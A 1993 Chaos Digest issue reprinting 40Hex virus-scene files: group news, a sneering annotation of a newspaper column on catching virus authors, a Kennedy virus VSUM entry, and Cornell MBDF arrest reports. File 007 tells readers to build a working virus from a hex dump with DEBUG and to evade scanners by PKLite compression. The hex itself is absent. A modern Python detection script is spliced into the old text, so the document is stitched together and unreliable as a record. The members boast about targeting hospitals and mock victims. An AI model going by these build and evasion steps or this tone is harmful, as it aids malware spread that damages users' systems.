Chaos Digest              Wednesday 9 June 1993           Volume 1 : Number 49
                                                             ISSN  1244-4901

       Editor: Jean-Bernard Condat (jbcondat@attmail.com)
       Archivist: Yves-Marie Crabbe
       Co-editors: Arnaud Bigare, Stephane Briere

TABLE OF CONTENTS, #1.49 (9 June 1993)
File 1--40H VMag Number 6 Volume 2 Issue 2 #005-008(1) (reprint)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
                linux-activists-request@niksula.hut.fi
with a mail header or first line containing the following information:
                    X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
groups.

Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
466893. Back issues of ChaosD can be found on the Internet as part of the
Computer underground Digest archives. They're accessible using anonymous FTP:

        * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
        * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
        * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
        * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
        * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
        * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
        * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
        * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited. Some
authors do copyright their material, and they should be contacted for reprint
permission. Readers are encouraged to submit reasoned articles in French,
English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses.
Please avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent the
views of the moderators. Chaos Digest contributors assume all responsibility
for ensuring that articles submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Number 6 Volume 2 Issue 2 #005-008(1) (reprint)

40Hex Number 6 Volume 2 Issue 2                                     File 005

I'm back, well kind of. Anyways, a lot of people have been asking, "What's
going on with the group?" The question should be, "What's going on with any
group these days?" It seems to me that 1992 was the death of h/p, or at least
the "ice age" of it. Everybody was either getting busted or quitting the
scene. Oh well, what can I say about it. Our group has been having bad luck
too. Five (now six) busted as well as other assorted bad things happening to
members.

Anyways, what's going on with us, huh? Well the reason you haven't heard much
from us is because we haven't been releasing our new stuff to BBS systems
(BBS system sounds as redundant as PIN number, I know) because we have a
strong feeling that members of such groups as the CVIA are logging on to h/p
boards in the hope of snatching the latest viruses. Well not much you can do
about it if you run a BBS, unless you personally know everyone who calls your
board. But come to think of it - what good does it prove to release your
newest creation to the general public (of the h/p crowd) via BBS system?
Isn't that the same principle as the warez puppy scene? I guess you all can do
whatever turns you on but we kind of decided that it would be in our best
interests to release our stuff to BBS's only after they have been detected by
the popular scanners or until they are kind of old.
Not to fear, 40-HEX and "Dark Angel Phunky Writing Guide" will still be on
boards at the same rate as always. As for all of you people bitching that we
no longer have sites and that we are dead, well you're dead - wrong. The
current sites are as follows (in no specific order) - Digital Warfare (yes
it's back, at a new number however), Time Lords BBS (The U.S.S.R System), The
Phunline (yes it's back), and the newest addition - Crow Technology. And as
for us being dead yeah right.

** Note from DecimatoR: The U.S.S.R System recently went down, due to Time
   Lord getting into a little hot water. It WILL return however... we're just
   not sure when. **

** Note from GHeap: I am coming back, gimme mo' time! **

So now with that out of the way, on to the other news. Hmmm... Michelangelo
caused quite a scare there for a while. It was pretty cool to see John,
Patti, and the rest of the crew on T.V... John Dvorak has a new half hour
computer talk show on syndicated radio. I'm sure he wouldn't mind if we got
on the show some time soon. Check your local radio guide for your local
station and time... I am offering a standing bounty of $1,500 for the person
willing to fly to Ohio and kick Crow Meister's ass for good. A minor would be
preferred, being that he is under 18 and if I smashed him I could get sued or
something. Just kidding, Crow Meister is cool with me, hihihihi... A new
federal law is being considered which if passed will outlaw the authorship of
computer viruses totally, research or not. Read more about that later in this
issue... Hey, I might have a BBS up soon! I have been saying that for the past
2 years haven't I? Well that's the news as I see it, it's nice to be writing
for this rag again. Check ya in 25 to life....

Hellraiser P/S 1992

This article was typed by Time Lord for HR cuz he is WAY too lazy to send me
a disk in place of a fuckin print out...
+++++

40Hex Number 6 Volume 2 Issue 2                                     File 006

Well, this little news "tid-bit" came from Attitude Adjuster, one of the few
non-PHALCON/SKISM contributors (ok, the ONLY non P/S member). Thanks a lot
dude, keep the submissions coming. The article itself is quite sad, and makes
me question the intelligence of our opposition.

-)GHeap&Demo

Thanx to CZ for THE line.

---------------------------------------------------------------------------
                    - We need Computer Virus Snitches -
             Written By Mike Royko, Tribune Media Services.
                     Retyped by The Attitude Adjuster
===========================================================================

Millions of computer users are wondering how to protect themselves against
the wave of viruses that are threatening their machines. I have a
suggestion. [So do I, avoid Bnu 1.90Beta]

First, they should remember that these viruses don't spring from nature. They
are little computer programs that are created and sent on their way by people
that are brainy, malicious and arrogant. [I am not brainy]

So, the question is, how do you find the creators of computer virus programs?

Because they are arrogant, it's likely that they want someone to know what a
clever thing they have done. They won't hold a press conference [Actually, we
do hold press conferences. See MichaelAlexander@Computerworld] but chances
are they will brag to a trusted friend or acquaintance or fellow hacker.

It is sad, but the world is full of snitches. [Get a thesaurus] Look at John
Gotti, the nation's biggest Mafia boss. There was a time when it was
unthinkable for even the lowest-level Mafia soldier to blab. But now Gotti
has to sit in court while his former right-hand man tells about how they got
people whacked. [We whack people too]

So if Mafia figures can be persuaded to tattle [Na-na-na-na-na], is there any
reason to believe that nerds have a greater sense of honor and loyalty? [Yes,
we also have brains]

Of course[.] not, but how do you get them to do it?

Money. [Now yer talking...
my mom is really the Dark Avenger, I want my money now.]

These companies [what companies, I only hit hospitals] could use petty cash
to place ads in the computer magazines and on the electronic bulletin boards.
[Ok, call my BBS and post this tidbit. 40Hex now has ad space available]

The ads would say something like: "A $50,000 reward for any information
leading to the arrest and conviction of virus authors." [How can you convict
a virus author. It isn't illegal. Go play Tank Wars.]

The next question would be what to do with the virus makers once they have
been caught. And that's the key to putting an end to the problem: something
that could be posted on those electronic bulletin boards that might cause an
aspiring virus-maker to go take a brisk walk instead.

A judge would sit and listen to an attorney who would say something like
this:

"Your honor, what we have here is an otherwise fine young man from a good
family. His father is a brilliant scholar, and the son will someday be the
same." [I am going to be a certified scholar when I grow up.]

"What he did was no more than an intellectual prank, a cerebral challenge of
sorts. Like the man who climbed Mount Everest because it was there, he
created the virus and sent it forth because it was there."

Then, we can hope, the judge might say something like this:

"Yes, I am impressed by the defendant's brain power. And I expected you to
ask me to give him a slap on the wrist."

"However, he is not a child. He is an adult. And I would think that so
brilliant a grown man would know better than to amuse himself by screwing
with the lives of strangers." [I haven't screwed one stranger]

"It's as if he hid inside the businesses and institutions until they were
closed and everyone had gone home. Then he came out and went through every
filing cabinet and drawer and shredded or burned every bit of useful
information he could find." [Cool! Let's try it.]
"Now, counselor, what would you and your law partners say if some street mope
[See Thesaurus] did that to your firm - crept in and destroyed every document
in your offices? Including the names of clients that owe you money. Hah, you
would be in here asking me to hang him from a tree." [I love hanging from
trees]

"So don't give me that smart kid from a good family routine. [I ain't smart,
and family ain't good] He is a self-centered, insensitive, uncaring, arrogant
goofball [And damn proud]. He didn't give a second thought to the chaos or
heartbreak he would cause an adoption agency, a hardworking businessman or a
medical clinic." [Yes I did. I aim for them.]

"Therefore, I sentence him to the maximum sentence the law allows in the
local jailhouse [0, NUL, ZIP-o, /dev/null, etc..], which is a really terrible
place, filled with all sorts of crude, insensitive hulks." [Jay-walkers]

"Bailiff, please get the defendant up off the floor and administer some
smelling salts." [More like, why is the defendant laughing?]

"And change his trousers, quickly." [Fuck you]

[] comments added by Demogorgon and GHeap
===========================================================================

I hope you enjoyed that one as much as I did! Okay, I see some really neat
things with this man's article. First off, I'm sure he's an adept
programmer... that is, he can probably figure out how to get his VCR to tape
something while he is off writing his brilliant articles. I enjoy his
narrow-minded definition of virii (that was mentioned in 40Hex 5), of course,
all virii are those evil overwriting, trigger date, resident, boot track
infecting swine (yeah, he probably learned what a virus was from watching ABC
News covering the Michelangelo crisis!) I also enjoy his opinion that all
virus authors are nerds. First off, what the hell is a nerd? I mean, I have
written a virus before (not saying it was any good), but, I don't feel like a
nerd!
In fact, I feel quite superior to most of the idiots like this guy. And, I
like his great statement about my loyalty. Yes, I'm gonna narc on [PHALCON/
[Forget this again, and die]]SKISM for $50,000!!! Yeah, right. There are a
lot of narcs on this not-so-good earth, so choose your friends wisely. I'm
quite sure that ads on BBS's (electronic bulletin boards! No... cork ones!)
would just sufficiently pump up user discussion of virii. I'm not scared of
fed intervention, and I doubt any authors I know are either. This was touched
on in 40Hex 5, virus authors are not responsible for the spread of their virii
unless they are actively spreading them! I mean, it's not my fault that K-Rad
Man sent my Hard Drive Blender (slices, dices, minces sectors) to 1000 Bible
boards in Utah. Apparently it hasn't dawned on this guy that most virii are
not written to be destructive. Actually, that's a lie. There are a lot of
virii out there that are destructive, but that is changing. People like the
PHALCON/SKISM crew realize that not everything must be destructive, opening
the doors to much larger virus projects (ie Bobisms).

One more thing... QUIT EQUATING THE WORD 'hacker' TO EVERY DAMN TYPE OF
ELECTRONIC 'crime!!!'

I'm gonna get this dude's phone #, I say we call him sometime...
-The Attitude Adjuster-

+++++

40Hex Number 6 Volume 2 Issue 2                                     File 007

Let's see what good ole' Patty has to say about this:

Virus Name:  Kennedy
Aliases:     Dead Kennedy, 333, Kennedy-333
Scan ID:     [Kennedy]
V Status:    Endangered
Discovered:  April, 1990
Symptoms:    .COM growth; message on trigger dates (see text); crosslinking
             of files; lost clusters; FAT corruption
Origin:      Denmark
Eff Length:  333 Bytes
Type Code:   PNCKF - Parasitic Non-Resident .COM Infector
Detection Method:  ViruScan, Pro-Scan, VirexPC, F-Prot, VirHunt 2.0+, NAV,
                   IBM Scan 2.00+, AVTK 4.32+, VIRx 1.6+, CPAV 1.0+,
                   Novi 1.0.1+, Sweep 2.3.1+, UTScan
Removal Instructions:  F-Prot, VirHunt 2.0+, or delete infected files

General Comments:
The Kennedy virus was isolated in April 1990. It is a generic infector of
.COM files, including COMMAND.COM.

This virus has three activation dates: June 6 (assassination of Robert
Kennedy 1968), November 18 (death of Joseph Kennedy 1969), and November 22
(assassination of John F. Kennedy 1963) of any year. On activation, the virus
will display the following message:

        "Kennedy is dead - long live 'The Dead Kennedys'"

The following text strings can be found in the viral code:

        "\command.com"
        "The Dead Kennedys"

Systems infected with the Kennedy virus will experience cross-linking of
files, lost clusters, and file allocation table errors (including messages
that the file allocation table is bad).
--------------------------------Cut Here------------------------------------
---------------------------------Cut Here-----------------------------------

Ok there it is. Not the most impressive virus around and its caught by just
about every scan on the market, but take PKLite to it and then remove the
PKLite header (Use NOLITE in this issue) and no one will be able to find it.
Anyway it gets the job done.

To make the above hex into a working file, first cut on the dotted lines.
Name the resulting file KENNEDY.TXT. Then:

DEBUG < KENNEDY.TXT

and you'll have a working virus.
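One way a defender could check .COM files for the indicators the VSUM entry above lists (the two signature strings, the 333-byte growth and the activation dates), as an added Python example that is not code from 40Hex, Chaos Digest or any scanner named in the entry; the sample images are constructed inline and are not real infected files.

```python
"""Indicator check for the Kennedy (.COM) virus, built from the VSUM entry:
two text strings in the viral code, an effective length of 333 bytes
(so an infected .COM grows by 333), and three activation dates."""
from __future__ import annotations

import datetime as dt
from pathlib import Path

# Indicators quoted from the VSUM entry.
KENNEDY_STRINGS = (b"\\command.com", b"The Dead Kennedys")
KENNEDY_LENGTH = 333
# (month, day): June 6, November 18, November 22 of any year.
KENNEDY_TRIGGER_DATES = {(6, 6), (11, 18), (11, 22)}


def string_indicators(image: bytes) -> list[str]:
    """Names of the Kennedy signature strings present in a .COM image."""
    return [s.decode("ascii") for s in KENNEDY_STRINGS if s in image]


def growth_matches(image_size: int, known_clean_size: int | None) -> bool:
    """True when the file grew by exactly the infective length."""
    if known_clean_size is None:
        return False
    return image_size - known_clean_size == KENNEDY_LENGTH


def is_trigger_day(month: int, day: int) -> bool:
    """True on one of the three activation dates (any year)."""
    return (month, day) in KENNEDY_TRIGGER_DATES


def is_trigger_date(day: dt.date) -> bool:
    return is_trigger_day(day.month, day.day)


def assess_com_image(image: bytes, known_clean_size: int | None = None) -> dict:
    """Combine the indicators into a verdict for one .COM image.

    Both strings together count as a match; one string alone, or growth of
    exactly 333 bytes against a known-good size, is flagged for review.
    """
    strings = string_indicators(image)
    grew = growth_matches(len(image), known_clean_size)
    verdict = "clean"
    if len(strings) == len(KENNEDY_STRINGS):
        verdict = "match"
    elif strings or grew:
        verdict = "review"
    return {"verdict": verdict, "strings": strings, "growth_333": grew,
            "size": len(image)}


def scan_directory(root: Path, baseline: dict[str, int] | None = None) -> dict[str, dict]:
    """Assess every *.COM file under root. baseline maps upper-case file
    names to their known clean sizes (e.g. taken from install media)."""
    baseline = baseline or {}
    results = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() == ".com":
            results[p.name] = assess_com_image(p.read_bytes(),
                                               baseline.get(p.name.upper()))
    return results


# Constructed sample images (not real files): a tiny clean program, the same
# program with a fake 333-byte appendage carrying both signature strings, and
# a benign program that merely mentions \command.com in a text message.
CLEAN_IMAGE = b"\xb4\x09\xcd\x21\xc3" + b"hello$"
FAKE_APPENDAGE = b"\x90" * 100 + b"\\command.com\x00" + b"The Dead Kennedys\x00"
FAKE_APPENDAGE += b"\x00" * (KENNEDY_LENGTH - len(FAKE_APPENDAGE))
INFECTED_IMAGE = CLEAN_IMAGE + FAKE_APPENDAGE
BENIGN_IMAGE = b"\xc3" + b"shell is \\command.com$"

if __name__ == "__main__":
    for name, img in (("clean", CLEAN_IMAGE), ("infected", INFECTED_IMAGE),
                      ("benign", BENIGN_IMAGE)):
        print(name, assess_com_image(img, known_clean_size=len(CLEAN_IMAGE)))
    print("trigger date today:", is_trigger_date(dt.date.today()))
```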
-Instigator

+++++

40Hex Number 6 Volume 2 Issue 2                                     File 008

Take a look at this. I picked it up on fidonet, originally from Virus-L
digest. All the stuff in *< >*'s is my comments.

- Demogorgon

------------------------------

VIRUS-L Digest   Wednesday, 26 Feb 1992    Volume 5 : Issue 44

------------------------------

Date:    Tue, 25 Feb 92 10:10:14 -0500
From:    mha@baka.ithaca.ny.us (Mark Anbinder)
Subject: MBDF Suspects Arrested (Mac)

The Cornell Daily Sun reported in this morning's issue that two Cornell
University sophomores, David Blumenthal and Mark Pilgrim, were arrested
Monday evening and arraigned in Ithaca City Court on one count each of second
degree computer tampering, in connection with the release of the MBDF virus
that infected Macs worldwide over the last several days. The two are being
held in Tompkins County Jail.

*< huh? How does one get arrested for spreading a virus, you ask? read on >*

Further charges are pending.

---

** many lines of mail routing crap have been deleted **

Date:    Tue, 25 Feb 1992 11:47:32 PST
From:    lipa@camis.stanford.edu (Bill Lipa)
Subject: Alleged MBDF virus-creators arrested at Cornell

"Computer Virus Traced to Cornell Students"
by Jeff Carmona
[The Cornell Daily Sun, 25 February 1992]

Two Cornell students were arrested yesterday for allegedly creating and
launching *< launching ? Bon voyage, we launched you !>* a computer virus
that crippled computers around the world, according to M. Stuart Lynn, the
University's vice president for information technologies.

David Blumenthal '94 and Mark Pilgrim '94 were arrested by Department of
Public Safety officers and arraigned in Ithaca City Court on one count of
second-degree computer tampering, a misdemeanor, *< cool, its only a
misdemeanor, how bad could it be ? >* Lynn said.

Both students were remanded to the Tompkins County Jail and remained in
custody early this morning. They are being held on $2,000 cash or $10,000
bail bond, officials said.
Cornell received national attention in Nov. 1988 when Robert T. Morris Jr., a
former graduate student, was accused of unleashing a computer virus into
thousands of government and university computers. Morris, convicted under the
1986 Computer Fraud and Abuse Act, was fined $10,000, given a three-year
probation and ordered to do 400 hours of community service by a federal judge
in Syracuse, according to Linda Grace-Kobas, *< Whats a Koba?? >* director of
the Cornell News Service.

Lynn would not compare the severity of the current case with Morris', saying
that "each case is different."

Lynn said the virus, called "MBDFA" was put into three Macintosh games --
Obnoxious Tetris, Tetriscycle and Ten Tile Puzzle. On Feb. 14, the games were
launched from Cornell to a public archive at Stanford University in Palo Alto,
Calif, Lynn said.

*< I guess these guys actually put it up on the archive under their own >*
*< accounts! Don't they know they can trace that stuff? duhhh...        >*

From there, the virus spread to computers in Osaka, Japan and elsewhere
around the world *< the archive was a dumb idea if thats how they got caught,
but it spread like hell >* when users connected to computer networks via
modems, he added. It is not known how many computers the virus has affected
worldwide, he explained.

When computer users downloaded the infected games, the virus caused "a
modification of system software," *< oooh...lets not get too technical >*
Lynn said. "This resulted in unusual behavior and system crashes," he added.

Lynn said he was not aware of anyone at Cornell who reported finding the
virus on their computers.

The virus was traced to Cornell last Friday, authorities were quickly
notified and an investigation began, Lynn said.

"We absolutely deplore this kind of behavior," Lynn said. "We will pursue
this matter to the fullest."
Armed with search warrants, Public Safety investigators removed more than a
dozen crates full of evidence from the students' residences in Baker and
Founders halls on West Campus.

*< sounds like a typical, over-kill bust to me. If you don't know what it is,
take it. >*

Public Safety officials refused to disclose the contents of the crates or
issue any comment about the incident when contacted repeatedly by phone last
night. *< thats because they don't know what the fuck the stuff is >*

"We believe this was dealt with very quickly and professionally," Lynn said.

The suspects are scheduled to appear in Ithaca City Court at 1 p.m. today and
additional charges are pending, according to Grace-Kobas.

Because spreading a computer virus violates federal laws, "conceivably, the
FBI could be involved," she added. Officials with the FBI could not be
reached to confirm or deny this.

Blumenthal and Pilgrim, both 19-year-olds, were current student employees at
Cornell Information Technologies (CIT), Lynn said. He would not say whether
the students launched the virus from their residence hall rooms or from a CIT
office.

Henrik N. Dullea '61, vice president for University relations, said he thinks
"the act will immediately be associated with the University," not only with
the individual students charged.

Because a major virus originated from a Cornell student in the past, this
latest incident may again "bring a negative reaction to the entire
institution," Dullea said. *< "blah, blah, blah" >*

"These are very selfish acts," Lynn said, referring to the intentional
distribution of computer viruses, because innocent people are harmed. Lynn
said he was unaware of the students' motive for initiating the virus.

Lynn said CIT put out a notice yesterday to inform computer users about the
"very virulent" virus. A virus-protection program, such as the new version of
Disinfectant, can usually cure computers, but it may be necessary to "rebuild
the hard drive" *< egad!
Not the dreaded "virus-that-makes-you-rebuild-your-hard-drive" !>* in some
cases, he added.

A former roommate of Blumenthal said he was not surprised by news of the
arrest. Computers were "more than a hobby" for Blumenthal, said Glen Fuller
'95, his roommate from last semester.

"He was in front of the computer all day," Fuller said. Blumenthal, who had a
modem, would "play around with viruses because they were a challenge to him,"
Fuller said. He said that, to his knowledge, Blumenthal had never released a
virus before.

-->-<------ Cut Here --------------------------

------------------------------

VIRUS-L Digest   Friday, 28 Feb 1992    Volume 5 : Issue 46

------------------------------

Date:    Wed, 26 Feb 92 11:08:45 -0800
From:    karyn@cheetah.llnl.gov (Karyn Pichnarczyk)
Subject: CIAC Bulletin C-17: MBDF A on Macintosh (Mac)

NO RESTRICTIONS
_____________________________________________________
        The Computer Incident Advisory Capability
                          CIAC
_____________________________________________________

                     INFORMATION BULLETIN

          New Virus on Macintosh Computers: MBDF A

February 25, 1992, 1130 PST                                   Number C-17
________________________________________________________________________

NAME:      MBDF A virus
PLATFORM:  Macintosh computers-except MacPlus and SE (see below)
DAMAGE:    May cause program crashes
SYMPTOMS:  Claris applications indicate they have been altered; some
           shareware may not work, unexplained system crashes
DETECTION & ERADICATION:  Disinfectant 2.6, Gatekeeper 1.2.4, Virex 3.6,
           VirusDetective 5.0.2, Rival 1.1.10, SAM 3.0
________________________________________________________________________

Critical Facts about MBDF A

A new Macintosh virus, MBDF A, (named for the resource it exploits) has been
discovered. This virus does not appear to maliciously cause damage, but
simply copies itself from one application to another.
MBDF A was discovered at two archive sites in newly posted game applications,
and has a high potential to be very widespread.

Infection Mechanism

This virus is an "implied loader" virus, and it works in a similar manner to
other implied loader viruses such as CDEF and MDEF. Once the virus is active,
clean application programs will become infected as soon as they are executed.
MBDF A infects only applications, and does not affect data files. This virus
replicates under both System 6 and System 7. While MBDF A may be present on
ALL types of Macintosh systems, it will not spread if the infected system is
a MacPlus or a Mac SE (although it does spread on an SE/30).

Potential Damage

The MBDF A virus has no malicious damaging characteristics, however, it may
cause programs to inexplicably crash when an item is selected from the menu
bar. Some programs, such as the shareware "BeHierarchic" program, have been
reported to not operate correctly when infected. Applications written with
self-checking code, such as those written by the Claris corporation, will
inform the user that they have been altered.

When MBDF A infects the system file, it must re-write the entire system file
back to disk; this process may take two or three minutes. If the user assumes
the system has hung, and reboots the Macintosh while this is occurring, the
entire system file will be corrupted and an entire reload of system software
must then be performed.

This virus can be safely eradicated from most infected programs, although
CIAC recommends that you restore all infected files from an uninfected
backup.

------------------------------

End of Chaos Digest #1.49
************************************

Downloaded From P-80 International Information Systems 304-744-2253